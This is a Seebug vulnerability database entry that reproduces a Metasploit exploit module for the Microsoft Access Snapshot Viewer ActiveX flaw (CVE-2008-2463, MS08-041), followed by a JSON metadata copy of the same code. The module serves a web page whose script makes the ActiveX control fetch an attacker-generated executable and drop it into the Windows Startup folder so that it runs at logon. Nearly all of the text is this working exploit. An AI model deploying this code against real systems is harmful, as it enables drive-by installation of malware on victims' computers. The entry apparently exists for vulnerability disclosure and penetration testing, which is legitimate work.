ID SSV:71119
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00
Description
No description provided by source.
##
# $Id: ms08_041_snapshotviewer.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download',
'Description' => %q{
This module allows remote attackers to place arbitrary files on a users file system
via the Microsoft Office Snapshot Viewer ActiveX Control.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revision: 10394 $',
'References' =>
[
[ 'CVE', '2008-2463' ],
[ 'OSVDB', '46749'],
[ 'MSB', 'MS08-041' ],
[ 'BID', '30114' ],
],
'Payload' =>
{
'Space' => 2048,
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 07 2008'))
register_options(
[
OptString.new('PATH', [ true, 'The path to place the executable.', 'C:\\\\Documents and Settings\\\\All Users\\\\Start Menu\\\\Programs\\\\Startup\\\\']),
], self.class)
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
payload_url = "http://"
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload"
if (request.uri.match(/payload/))
return if ((p = regenerate_payload(cli)) == nil)
data = generate_payload_exe({ :code => p.encoded })
print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
return
end
vname = rand_text_alpha(rand(100) + 1)
exe = rand_text_alpha(rand(20) + 1)
content = %Q|
<html>
<head>
<script>
try {
var #{vname} = new ActiveXObject('snpvw.Snapshot Viewer Control.1');
#{vname}.SnapshotPath = "#{payload_url}";
#{vname}.CompressedPath = "#{datastore['PATH']}\\#{exe}.exe";
#{vname}.PrintSnapshot();
} catch( e ) { window.location = 'about:blank' ; }
</script>
</head>
</html>
|
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
send_response_html(cli, content)
handler(cli)
end
end
{"href": "https://www.seebug.org/vuldb/ssvid-71119", "status": "cve,poc,details", "history": [], "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-71119", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2014-07-01T00:00:00", "sourceData": "\n ##\r\n# $Id: ms08_041_snapshotviewer.rb 10394 2010-09-20 08:06:27Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::EXE\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module allows remote attackers to place arbitrary files on a users file system\r\n\t\t\t\tvia the Microsoft Office Snapshot Viewer ActiveX Control.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2008-2463' ],\r\n\t\t\t\t\t[ 'OSVDB', '46749'],\r\n\t\t\t\t\t[ 'MSB', 'MS08-041' ],\r\n\t\t\t\t\t[ 'BID', '30114' ],\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 2048,\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', { } ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Jul 07 2008'))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('PATH', [ true, 'The path to place the executable.', 'C:\\\\\\\\Documents and Settings\\\\\\\\All Users\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\Startup\\\\\\\\']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef autofilter\r\n\t\tfalse\r\n\tend\r\n\r\n\tdef check_dependencies\r\n\t\tuse_zlib\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\tpayload_url = "http://"\r\n\t\tpayload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\r\n\t\tpayload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload"\r\n\r\n\t\tif (request.uri.match(/payload/))\r\n\t\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\t\t\tdata = generate_payload_exe({ :code => p.encoded })\r\n\t\t\tprint_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")\r\n\t\t\tsend_response(cli, data, { 'Content-Type' => 'application/octet-stream' })\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tvname = rand_text_alpha(rand(100) + 1)\r\n\t\texe = rand_text_alpha(rand(20) + 1)\r\n\r\n\t\tcontent = %Q|\r\n\t\t<html>\r\n\t\t<head>\r\n\t\t\t<script>\r\n\t\t\ttry {\r\n\t\t\t\tvar #{vname} = new ActiveXObject('snpvw.Snapshot Viewer Control.1');\r\n\t\t\t\t#{vname}.SnapshotPath = "#{payload_url}";\r\n\t\t\t\t#{vname}.CompressedPath = "#{datastore['PATH']}\\\\#{exe}.exe";\r\n\t\t\t\t#{vname}.PrintSnapshot();\r\n\t\t\t} catch( e ) { window.location = 'about:blank' ; }\r\n\t\t\t</script>\r\n\t\t</head>\r\n\t\t</html>\r\n\t\t\t\t|\r\n\r\n\t\tprint_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")\r\n\r\n\t\tsend_response_html(cli, content)\r\n\r\n\t\thandler(cli)\r\n\r\n\tend\r\n\r\nend\r\n\n ", "id": "SSV:71119", "enchantments_done": [], "_object_type": "robots.models.seebug.SeebugBulletin", "type": "seebug", "lastseen": "2017-11-19T16:41:23", "reporter": "Root", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2017-11-19T16:41:23"}, "dependencies": {"references": [], "modified": "2017-11-19T16:41:23"}, "vulnersScore": -0.2}, "objectVersion": "1.4", "references": []}
{}